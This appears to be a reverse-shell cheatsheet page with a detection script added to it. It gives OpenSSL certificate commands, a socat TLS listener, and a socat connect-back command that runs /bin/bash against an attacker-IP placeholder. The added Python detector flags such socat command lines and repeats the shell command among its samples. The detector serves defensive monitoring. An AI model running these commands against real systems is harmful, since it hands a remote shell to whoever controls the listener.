Reverse Shells - security

Cheatsheets

PayloadsAllTheThings
PentestMonkey Cheatsheet
SecLists
        

Generate OpenSSL Certificate

openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
# Creates a 2048-bit RSA key and a matching self-signed certificate, valid for just under a year.
# -nodes leaves the private key unencrypted on disk.

We then need to merge the two created files into a single .pem file:
cat shell.key shell.crt > shell.pem
        

Set up OpenSSL Reverse shell listener

1. Generate shell.pem file using steps in "Generate OpenSSL Certificate"
2. Set up listener on attacking machine: socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -
3. Connect back using: socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash
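
Added example (not part of the original cheatsheet): a detection-side check for the socat invocations above, run over process command lines as they would appear in process-creation logs. The function names, finding labels and sample lines are assumptions made for illustration.

```python
import shlex

# Shell names that should not normally be the EXEC/SYSTEM target of a socat process.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}


def parse_address(arg):
    """Split one socat address 'TYPE:params,opt=val,...' into its parts."""
    head, *opts = arg.split(",")
    addr_type, _, params = head.partition(":")
    options = {}
    for opt in opts:
        key, _, val = opt.partition("=")
        options[key.lower()] = val
    return addr_type.upper(), params, options


def classify(cmdline):
    """Return sorted finding labels for one process command line."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes, e.g. a truncated log field
        return []
    if not argv or argv[0].rsplit("/", 1)[-1] != "socat":
        return []
    findings = set()
    for arg in argv[1:]:
        addr_type, params, options = parse_address(arg)
        # TLS address whose peer certificate check has been switched off
        if addr_type.startswith("OPENSSL") and options.get("verify") == "0":
            findings.add("tls-no-verify")
        # A shell wired directly to the other end of the relay
        words = params.split()
        if addr_type in ("EXEC", "SYSTEM") and words:
            if words[0].rsplit("/", 1)[-1] in SHELLS:
                findings.add("shell-exec")
    return sorted(findings)


# Constructed sample command lines (documentation addresses, not real hosts).
SAMPLE = [
    "socat OPENSSL-LISTEN:4443,cert=shell.pem,verify=0 -",
    "socat OPENSSL:192.0.2.10:4443,verify=0 EXEC:/bin/bash",
    "socat OPENSSL:backup.example.internal:8443,cafile=/etc/ssl/ca.pem STDIO",
    "/usr/bin/socat TCP-LISTEN:8080,fork TCP:127.0.0.1:80",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line) or ["ok"], line)
```

A socat process that combines both findings is the pattern to alert on; verify=0 alone also turns up in test setups that use self-signed certificates.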